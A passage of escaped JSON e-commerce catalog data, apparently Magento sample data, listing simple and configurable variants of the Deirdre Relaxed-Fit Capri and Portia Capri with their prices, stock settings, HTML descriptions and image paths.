"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Blue\"},\"1847\":{\"sku\":\"WP12-29-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Deirdre Relaxed-Fit Capri-29-Gray\",\"description\":\"<p>Invigorate your yoga practice with this Deirdre Relaxed-Fit Capri, designed to let you move without strain or restriction.<\\/p>\\n<p>&bull; Heather gray capris with mint green waist &amp; accents.<br \\/>&bull; Comfortable, relaxed fit with high rise.<br \\/>&bull; Moisture-wicking, 4-way stretch construction.<br \\/>&bull; Lined with mesh for better support.<br \\/>&bull; Hidden pocket at waistband.<br \\/>&bull; Flatlock seams and lined gusset for comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"deirdre-relaxed-fit-capri-29-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp12-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp12-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp12-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp12-gray_back.jpg\",\"image\":\"\\/w\\/p\\/wp12-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp12-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp12-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Gray\"},\"1848\":{\"sku\":\"WP12-29-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Deirdre Relaxed-Fit Capri-29-Green\",\"description\":\"<p>Invigorate your yoga practice with this Deirdre Relaxed-Fit Capri, designed to let you move without strain or restriction.<\\/p>\\n<p>&bull; Heather gray capris with mint green waist &amp; accents.<br \\/>&bull; Comfortable, relaxed fit with high rise.<br \\/>&bull; Moisture-wicking, 4-way stretch construction.<br \\/>&bull; Lined with mesh for better support.<br \\/>&bull; Hidden pocket at waistband.<br \\/>&bull; Flatlock seams and lined gusset for comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"deirdre-relaxed-fit-capri-29-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Green\"},\"1849\":{\"sku\":\"WP12\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Deirdre Relaxed-Fit Capri\",\"description\":\"<p>Invigorate your yoga practice with this Deirdre Relaxed-Fit Capri, designed to let you move without strain or restriction.<\\/p>\\n<p>&bull; Heather gray capris with mint green waist &amp; accents.<br \\/>&bull; Comfortable, relaxed fit with high rise.<br \\/>&bull; Moisture-wicking, 4-way stretch construction.<br \\/>&bull; Lined with mesh for better support.<br \\/>&bull; Hidden pocket at waistband.<br \\/>&bull; Flatlock seams and lined gusset for comfort.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp12-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp12-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp12-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Capri,material=Cocona&reg; performance fabric|Organic Cotton|Rayon,pattern=Color-Blocked,climate=Indoor|Hot|Mild,eco_collection=Yes,performance_fabric=Yes,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WP12-28-Blue,size=28,color=Blue|sku=WP12-28-Gray,size=28,color=Gray|sku=WP12-28-Green,size=28,color=Green|sku=WP12-29-Blue,size=29,color=Blue|sku=WP12-29-Gray,size=29,color=Gray|sku=WP12-29-Green,size=29,color=Green\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp12-gray_back.jpg\",\"image\":\"\\/w\\/p\\/wp12-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp12-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp12-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Capri\",\"material\":\"Cocona&reg; performance fabric|Organic Cotton|Rayon\",\"pattern\":\"Color-Blocked\",\"climate\":\"Indoor|Hot|Mild\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1850\":{\"sku\":\"WP13-28-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Portia Capri-28-Blue\",\"description\":\"<p>From yoga at dawn to evenings curled up with a book, our Portia Capri gives you the comfort and freedom to cruise through the day. The high-waisted design keeps you covered while you\'re bending and stretching, while contrast stripes promise a dash of sporty style.<\\/p>\\n<p>&bull; Salmon heather capri sweats.<br \\/>&bull; Relaxed fit, high waist. <br \\/>&bull; Inseam: 21\\\". <br \\/>&bull; Wide elastic waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"portia-capri-28-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp13-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp13-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp13-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp13-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp13-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Blue\"},\"1851\":{\"sku\":\"WP13-28-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Portia Capri-28-Green\",\"description\":\"<p>From yoga at dawn to evenings curled up with a book, our Portia Capri gives you the comfort and freedom to cruise through the day. The high-waisted design keeps you covered while you\'re bending and stretching, while contrast stripes promise a dash of sporty style.<\\/p>\\n<p>&bull; Salmon heather capri sweats.<br \\/>&bull; Relaxed fit, high waist. <br \\/>&bull; Inseam: 21\\\". <br \\/>&bull; Wide elastic waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"portia-capri-28-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp13-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp13-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp13-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp13-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp13-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Green\"},\"1852\":{\"sku\":\"WP13-28-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Portia Capri-28-Orange\",\"description\":\"<p>From yoga at dawn to evenings curled up with a book, our Portia Capri gives you the comfort and freedom to cruise through the day. The high-waisted design keeps you covered while you\'re bending and stretching, while contrast stripes promise a dash of sporty style.<\\/p>\\n<p>&bull; Salmon heather capri sweats.<br \\/>&bull; Relaxed fit, high waist. <br \\/>&bull; Inseam: 21\\\". <br \\/>&bull; Wide elastic waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"portia-capri-28-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp13-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp13-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp13-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp13-orange_back.jpg\",\"image\":\"\\/w\\/p\\/wp13-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp13-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp13-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Orange\"},\"1853\":{\"sku\":\"WP13-29-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Portia Capri-29-Blue\",\"description\":\"<p>From yoga at dawn to evenings curled up with a book, our Portia Capri gives you the comfort and freedom to cruise through the day. The high-waisted design keeps you covered while you\'re bending and stretching, while contrast stripes promise a dash of sporty style.<\\/p>\\n<p>&bull; Salmon heather capri sweats.<br \\/>&bull; Relaxed fit, high waist. <br \\/>&bull; Inseam: 21\\\". <br \\/>&bull; Wide elastic waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"portia-capri-29-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp13-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp13-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp13-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp13-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp13-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Blue\"},\"1854\":{\"sku\":\"WP13-29-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Portia Capri-29-Green\",\"description\":\"<p>From yoga at dawn to evenings curled up with a book, our Portia Capri gives you the comfort and freedom to cruise through the day. The high-waisted design keeps you covered while you\'re bending and stretching, while contrast stripes promise a dash of sporty style.<\\/p>\\n<p>&bull; Salmon heather capri sweats.<br \\/>&bull; Relaxed fit, high waist. <br \\/>&bull; Inseam: 21\\\". <br \\/>&bull; Wide elastic waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"portia-capri-29-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp13-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp13-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp13-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp13-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp13-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Green\"},\"1855\":{\"sku\":\"WP13-29-Orange\",\"store_view_code\":null,\"attribute_set_